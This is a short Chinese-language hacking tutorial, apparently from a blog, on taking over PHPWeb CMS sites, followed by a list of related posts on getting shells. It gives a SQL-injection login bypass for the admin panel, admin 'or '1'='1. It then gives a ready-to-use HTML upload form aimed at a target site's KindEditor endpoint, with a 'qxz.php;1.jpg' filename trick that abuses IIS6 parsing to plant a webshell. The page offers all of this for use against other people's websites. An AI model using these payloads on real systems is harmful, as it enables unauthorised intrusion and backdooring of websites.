phpweb后台拿shell方法
首先登录后台admin.php(默认后台admin.php)
有的phpweb网站存在万能密码登录
帐号密码都输入:admin 'or '1'='1直接登录
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com 改成你的目标网站地址。
<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="qxz.php;1.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
phpweb后台拿shell方法相关推荐
- phpweb后台拿shell简单方法
关于phpweb后台拿shell简单方法. 首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地 ...
- 网站后台拿shell方法总结
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全 ...
- Ecshop后台拿shell方法总结
方法一:龙儿心发明的,版本未定,估计都行. 进入后台-系统设置-Flash播放器管理 可以上传任意文件. [includes/fckeditor /editor/filemanager/connect ...
- php用户管理拿shell,PHPWEB网站管理系统后台拿shell
前几天贫道拿一个IDC的分站 看到了PHPWEB 于是默认的进入了后台 不过进去之后拿shell难住了 妹夫的 去百度一下 那个方法失效 版本: V1.4.3 / 20100925 无奈中 于是在刁科 ...
- 帝国 loginjs.php,帝国cms 6.6 后台拿shell
时间:2013-02-27来源:源码库 作者:源码库 文章热度: ℃ 漏洞作者: 付弘雪 提交时间: 2013-01-21 公开时间: 2013-01-21 漏洞类型: 文件上传导致任意代码执行 简要 ...
- 后台得到webshell方法大汇总
动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常费了九牛 ...
- joomla后台拿shell
整理了joomla后台拿shell的几种方法,不解释,至于怎么进后台晓得也不晓得- 第一种 官网下载joomla中文包com_zmaxappstore.zip,解压修改install.xml 添加&l ...
- 后台拿shell全集
正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧! 今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望 ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...
最新文章
- 【Pandas库】(3) DataFrame的创建方法及基本操作
- filco蓝牙不好用_2020双十二机械键盘选购 牌子推荐 附雷柏/ikbc/akko/杜伽/FILCO热销机械键盘品牌...
- 计算机网络是由一组结点组成吗,分布式数据库系统是由一组数据组成的,这组数据分布在计算机网络的不同计算机上,网络中的每个结点_考题宝...
- [云炬创业基础笔记]第四章测试19
- activiti 工作流_一文让你读懂什么是Activiti工作流
- React开发(246):react项目理解 this打印
- 前端学习(635):字符串拼接
- 协程asyncio_Asyncio深入浅出
- Activiti启动某个流程失败,页面报500
- Ubuntu16.04 LTS下apt安装WireShark
- [Luogu] 模板题-最近公共祖先
- python编程语言继承_如何使用Python继承机制(子类化内置类型)
- android虚拟摇杆
- csr蓝牙驱动Linux,csr harmony蓝牙适配器驱动
- 解决CondaVerificationError: The package for pytorch located at...
- Unity 3D模型展示之拖拽
- 个人小程序和企业小程序
- 网状结构的“数据”区域
- poi-tl导出word;自定义列表序号和表格宽度,表格合并,自定义标题,更新目录
- matlab之矩阵输入(一)